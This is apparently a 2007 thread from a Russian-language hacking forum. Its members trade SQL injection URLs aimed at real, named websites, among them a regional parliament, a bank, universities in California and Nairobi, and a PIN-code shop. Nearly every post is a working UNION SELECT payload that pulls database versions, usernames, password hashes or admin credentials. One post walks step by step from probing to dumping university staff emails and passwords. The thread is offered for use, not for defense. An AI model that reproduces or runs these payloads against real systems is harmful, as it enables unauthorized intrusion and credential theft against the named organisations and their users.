29.07.2007, 01:09
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами:
10263663
Репутация:
1559
|
|
//
http://www.nww.co.ir/gallery/property.php?cid=9&uid=0&pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(us ername,0x3A,userpassword),9,10,11,12,13,14,15,16,1 7%20from%20users
|
|
|
29.07.2007, 12:23
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами:
10172486
Репутация:
874
|
|
To 0nep@t0p. По поводу
http://www.mosoblduma.ru/index.php?action=more&pid=13&id=-395+union+select+1,2,3,4,5/*
Тут действительно скуль 3 версии (точнее 32359). И иньекция возможна. Вот как удалось определить версию
http://www.mosoblduma.ru/index.php?action=more&pid=13&id=395+/*!32359+AND+0+*/
Помогла статья http://www.securitylab.ru/contest/212101.php - SQL инъекция в MySQL сервере третей версии.
Но дальше не копал, мороки много если нужно колупай.
З.Ы. Оказываеться не только UNION SELECT  |
|
|
|
29.07.2007, 14:20
|
|
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
С нами:
10214321
Репутация:
552
|
|
Код:
http://www.lancerregister.com/store_category.php?id=-17+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
|
|
|
|
29.07.2007, 18:50
|
|
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
С нами:
10555586
Репутация:
726
|
|
_http://www.a2k.org.ua/news.php?id=-1+union+select+1,2,3,4,password,user,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38+from+users+where+id= 1/*
|
|
|
|
29.07.2007, 20:19
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
С нами:
10153766
Репутация:
2565
|
|
Банк "Экспресс-Кредит"
www.expr.ru
Код:
http://www.expr.ru/news2/?act=show_news&id=-1+union+select+1,2,version(),user(),5,6,7,8/*
|
|
|
|
30.07.2007, 01:37
|
|
Познавший АНТИЧАТ
Регистрация: 21.03.2007
Сообщений: 1,200
С нами:
10074686
Репутация:
1204
|
|
Dominican University of California
http://www.dominican.edu/query/class.php?event_id=-1%20union%20select%201,2,3,4,5,6,7,8,9,convert(con cat(user(),char(58),version(),char(58),database()) %20using%20latin1),11,12,13,14,15,16,17,18,19,20,2 1/*
|
|
|
|
30.07.2007, 02:02
|
|
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
С нами:
10214321
Репутация:
552
|
|
магазин PIN-кодов
Код:
http://popolni.in.ua/shop.php?r=-1+union+select+1,2,3,concat(id,0x3a,pass,0x3a,name,0x3a,status),5,6,7+from+admins+limit+1,1/*
|
|
|
|
30.07.2007, 04:33
|
|
Познавший АНТИЧАТ
Регистрация: 21.03.2007
Сообщений: 1,200
С нами:
10074686
Репутация:
1204
|
|
University of Nairobi // ну да, сегодня универы :(
Подозрение
http://www.uonbi.ac.ke/contact_details.php?contactName=Department+of+Huma n+Anatomy&contactID='
Подбираем колонки
http://www.uonbi.ac.ke/contact_details.php?contactName=Department+of+Huma n+Anatomy&contactID=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12/*
Узнаем основную информацию
http://www.uonbi.ac.ke/contact_details.php?contactName=Department+of+Huma n+Anatomy&contactID=-1%20union%20select%201,concat(user(),char(58),vers ion(),char(58),database()),3,4,5,6,7,8,9,10,11,12/*
Пятерка. Смотрим таблицы и колонки
http://www.uonbi.ac.ke/contact_details.php?contactName=Department+of+Huma n+Anatomy&contactID=-1%20union%20select%201,table_name,3,4,5,6,7,8,9,10 ,11,12%20from%20information_schema.tables/*
http://www.uonbi.ac.ke/contact_details.php?contactName=Department+of+Huma n+Anatomy&contactID=-1%20union%20select%201,column_name,3,4,5,6,7,8,9,1 0,11,12%20from%20information_schema.columns/*
Выводим че-нить..
http://www.uonbi.ac.ke/contact_details.php?contactName=Department+of+Huma n+Anatomy&contactID=-1%20union%20select%201,concat(EMAIL,char(58),PASSW ORD),3,4,5,6,7,8,9,10,11,12%20from%20UNIVERSITY_ST AFF/*
|
|
|
|
30.07.2007, 10:13
|
|
Новичок
Регистрация: 27.07.2007
Сообщений: 1
С нами:
9890119
Репутация:
0
|
|
club.azlk.ru
http://club.azlk.ru/index.php3?mode=showcar&carid=-1+union+select+1,passwd,nick,4,5,6,7,8,9,10,name,1 2,13,14,15,16+from+users+limit+1,1
|
|
|
|
30.07.2007, 15:54
|
|
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
С нами:
10555586
Репутация:
726
|
|
_http://www.dubinushka.ru/m_files.php?ms_id=-54+union+select+1,concat(login,0x3a,pass)+from+use rs/*
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?424237){kind=avatar}
Комбинированный вид
